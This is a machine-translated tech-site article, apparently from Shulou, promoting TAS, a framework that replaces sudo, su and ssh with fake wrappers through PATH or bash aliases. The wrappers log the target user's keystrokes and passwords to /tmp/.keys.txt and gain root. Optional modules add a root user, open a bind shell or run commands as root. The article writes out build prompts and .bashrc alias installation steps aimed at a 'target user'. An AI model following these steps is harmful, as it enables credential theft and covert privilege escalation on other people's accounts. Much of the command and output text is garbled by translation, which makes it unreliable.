Shulou(Shulou.com)06/01 Report--

This article mainly introduces an example analysis of a lightweight tty modification and code forgery framework in TAS. The article is very detailed and has a certain reference value. Interested friends must read it!

TAS is a lightweight framework that allows researchers to easily modify tty and create fake code.

The framework has three main functions, namely tas_execv, tas_forkpty, and tas_tty_loop:

1. Tas_execv: this function is similar to execv, but it does not re-execute the current code, which is very useful for creating forged code

2. Tas_forkpty: this function is the same as forkpty, except that it automatically populates the custom structure, checks the forkpty operation page and gets details

3. Tas_tty_loop: this function is responsible for modifying the tty. We can set the hook function for the input and output data, so that we can get the keystroke data entered by the user or modify the terminal output (leet-shell).

If you need an in-depth understanding of how TAS works, you can check the project's "tas/fakebins/fun" directory for more information.

Forged code

By changing the PATH environment variable, or using Bash's Aliases (or other Shell that supports Aliases), you can run other programs directly without having to run the program that the user actually wants to run. In this way, we can capture the keystroke data of the target user and modify the command line to change the behavior of the original program.

Modifying the command line of some programs, such as sudo and su, will help us to lift rights on the target device.

In order to make it easy for you to understand and use TAS, I have created three sample programs to demonstrate the functionality of the framework, namely sudo, su and generic-keylogger.

Generic-keylogger

Generic-keylogger, as its name suggests, can be used as a keylogger, and here we mainly use it to obtain passwords for programs like ssh and mysql.

Sudo/su

Of course, it can also be used as a keylogger, or you can run some functional modules with root permissions (by modifying the command line).

Cmd modification steps

First, the target user enters and runs the following command:

Sudo cmd

At this point, the actual command to run is as follows:

Fakesudo cmd

Where fakesudo will execute the following command:

Sudo fakesudo cmd

After running the above command with root privileges, fakesudo will create a child process to execute some of its functional modules, and in the process's main PID, it will run the original command. Note that fakesudo will only modify the command if the user runs the command sudo cmd [args]. If additional command run parameters are added, the command cannot be modified.

If you are using su, the situation is similar to that of sudo.

First, the target user enters and runs the following command:

Su-

At this point, the actual command to run is as follows:

Fakesu-

Where fakesudo will execute the following command:

Su-c fakesu

After running the above command with root privileges, fakesu will create a child process to execute some of its functional modules, and in the process's main PID, it will run the bash-I command.

Note: fakesu modifies the command only if the user runs su or su -. If additional command run parameters are added, the command cannot be modified.

Function module

Currently, the tool has only the following three functional modules:

1. Add-root-user: create a root user with the password in / etc/passwd

2. Bind-shell: listens for incoming connections and generates a tty shell

3. System: execute commands with root permissions

Project download

The vast majority of researchers can use the following commands to clone the project source code locally:

Git clone https://github.com/hc0d3r/tas.git project build

First, we need to build the project base library:

$make CC .obj / globals.o CC .obj / getinode.o CC. Obj/tas-execv.o CC .obj / tty.o CC .obj / xreadlink.o AR .obj / libtas.a

Next, we also need to run the following command to build sudo, su, and generic-keylogger:

Make [target-bin]

Build the sample:

$make sumake [1]: Entering directory'/ home/test/tas/fakebins/su' [+] configuring fakesu... enable keylogger? Ynumber of lines to record [empty = store all]: logfile (default: / tmp/.keys.txt): use some FUN modules? [y fakessh N] n [+] configuration file created in / home/test/tas/fakebins/su/config.h CC sumake [1]: the Leaving directory'/ home/test/tas/fakebins/su' tool uses samples to create a fakessh

Compile:

$make generic-keyloggermake [1]: Entering directory'/ home/test/tas/fakebins/generic-keylogger' [+] configuring generic-keylogger... number of lines to record [empty = store all]: 3logfile (default: / tmp/.keys.txt): [+] configuration file created in / home/test/tas/fakebins/generic-keylogger/config.h CC generic-keyloggermake [1]: Leaving directory'/ home/test/tas/fakebins/generic-keylogger'

Installation:

$mkdir ~ / .bin$ cp generic-keylogger ~ / .bin/ssh$ echo "alias ssh='$HOME/.bin/ssh'" > > ~ / .bashrc

Demo:

Use the bind-shell module

Compile:

Make [1]: Entering directory'/ home/test/tas/fakebins/sudo' [+] configuring fakesudo... enable keylogger? [y/N] nuse some FUN modules? [configuration file created in N] y [1] add-root-user [2] bind-shell [3] system [4] cancel > 2listen port (Default: 1337): 5992 [+] configuration file created in / home/test/tas/fakebins/sudo/config.h CC sudomake [1]: Leaving directory'/ home/test/tas/fakebins/sudo'

Installation:

$cp sudo ~ / .sudo$ echo "alias sudo='$HOME/.sudo'" > > ~ / .bashrc

Demo:

Leet-shell

In the leet-shell usage example, you can modify the tty output, which will allow you to use bash (similar to 1337 h5x0r):

[test@alfheim tas] $make fun/leet-shell CC fun/leet-shell [t3st@alfheim tas] $fun/leet-shellSP4WN1NG L33T SH3LL H3R3! [t3st@4lfh41m T4s] $3ch0 'l33t sh4ll 1s l33t! 'l33t sh4ll 1s l33t!! The above is all the contents of the article "sample Analysis of a lightweight tty Modification and Code forgery Framework in TAS". Thank you for reading! Hope to share the content to help you, more related knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.